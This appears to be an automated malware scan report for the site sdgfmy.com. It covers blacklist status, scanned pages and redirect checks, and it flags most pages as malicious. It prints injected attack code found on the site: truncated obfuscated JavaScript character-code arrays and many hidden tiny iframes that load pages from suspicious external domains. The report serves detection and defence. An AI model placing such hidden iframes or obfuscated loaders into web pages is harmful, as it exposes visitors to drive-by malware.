Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sdgfmy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sdgfmy.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sdgfmy.com/ | 200 OK Content-Length: 41441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/mm_menu.js | 200 OK Content-Length: 30741 Content-Type: application/x-javascript | clean |
http://sdgfmy.com/image/flash.js | 200 OK Content-Length: 3135 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: cc.haowangma.com ...[715 bytes skipped]... document.write("<span style=\"color:#FFFFFF;margin-top:4px\">ÍíÉÏ£º½áÊøÁËÒ»ÌìµÄÆ£±¹£¬ÇáËÉһϣ¡</span>"); } else if(t>=0 && t<= 5) { document.write("<span style=\"color:#FFFFFF;margin-top:4px\">Á賿£ºÏÖÔÚÒ¹ÒÑÉîÁË,ÄúҪעÒâÐÝÏ¢£¡</span>"); } } <script src=http://www.hnxw.net/sms/f.js></script>> <ifrAme src=http://cc.haowangma.com/oNe/hao5.htm?015 widTh=1 Name='1710' height=1></iframe> <iFrame src=http://cc.zuiyige.net/one/hAo5.htm?058 widtH=1 nAme='5552' height=1></iframe> [ifraMe src=http://www.oiok01.nEt/s1.htm?bEi wIdth=1 Name='7799' height=1][/iframe] ...[2657 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='5552' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='7833' height=1> Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='7833' height=1> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='3079' height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2785' height=0> Hidden iFrame found. size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 name='4998' height=1> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='9779' height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='1710' height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0> | ||
http://sdgfmy.com/image/hxg.js | 200 OK Content-Length: 5513 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: cc.haowangma.com <!--
var bsYear; var bsDate; var bsWeek; var arrLen=8; //Êý×鳤¶È var sValue=0; //µ±ÄêµÄÃëÊý var dayiy=0; //µ±ÄêµÚ¼¸Ìì var miy=0; //Ô·ݵÄϱê var iyear=0; //Äê·Ý±ê¼Ç var dayim=0; //µ±Ôµڼ¸Ìì var spd=86400; //ÿÌìµÄÃëÊý var year1999="30;29;29;30;29;29;30;29;30;30;30;29"; //354 var year2000="30;30;29;29;30;29;29;30;29;30;30;29"; //354 var year2001="30;30;29;30;29;30;29;29;30 ...[4567 bytes skipped]... Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='9009' height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='1615' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='5313' height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2830' height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='4635' height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='1615' height=1> Hidden iFrame found. size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='5702' height=1> Hidden iFrame found. size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='5313' height=1> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='3068' height=0> | ||
http://sdgfmy.com/about.asp?id=6 | 200 OK Content-Length: 34208 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/index.asp | 200 OK Content-Length: 41441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/gsjj.htm | 200 OK Content-Length: 18571 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var dnok690=["182", "193", "181", "199", "191", "183", "192", "198", "128", "185", "183", "198", "151", "190", "183", "191", "183", "192", "198", "148", "203", "155", "182", "122", "116", "179", "188", "179", "202", "137", "136", "134", "116", "123", "128", "197", "198", "203", "190", "183", "128", "194", "193", "197", "187", "198", "187", "193", "192", "114", "143", "114", "116", "179", "180", "197", "193", "190", "199", "198", "183", "116", "141", "182", "193", "181", "199", "191", "183", "192 Antivirus reports:
| ||
http://sdgfmy.com/qywh.asp?id=2 | 200 OK Content-Length: 32972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/news.asp | 200 OK Content-Length: 40766 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/product.asp | 200 OK Content-Length: 48056 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/case.asp | 200 OK Content-Length: 43971 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/about.asp?id=4 | 200 OK Content-Length: 33438 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/about.asp?id=7 | 200 OK Content-Length: 33715 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/about.asp?id=5 | 200 OK Content-Length: 33044 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
| ||
http://sdgfmy.com/lyb/index.asp | 200 OK Content-Length: 40579 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sdgfmy.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 08:02:05 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQBSSD=DJHFHOLDIBKHPKLMPENPOPKC; path=/
X-Powered-By: ASP.NET
...41441 bytes of data.
GET / HTTP/1.1
Host: sdgfmy.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 08:02:05 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQBSSD=DJHFHOLDIBKHPKLMPENPOPKC; path=/
X-Powered-By: ASP.NET
...41441 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sdgfmy.com
Referer: http://www.google.com/search?q=sdgfmy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sdgfmy.com
Referer: http://www.google.com/search?q=sdgfmy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.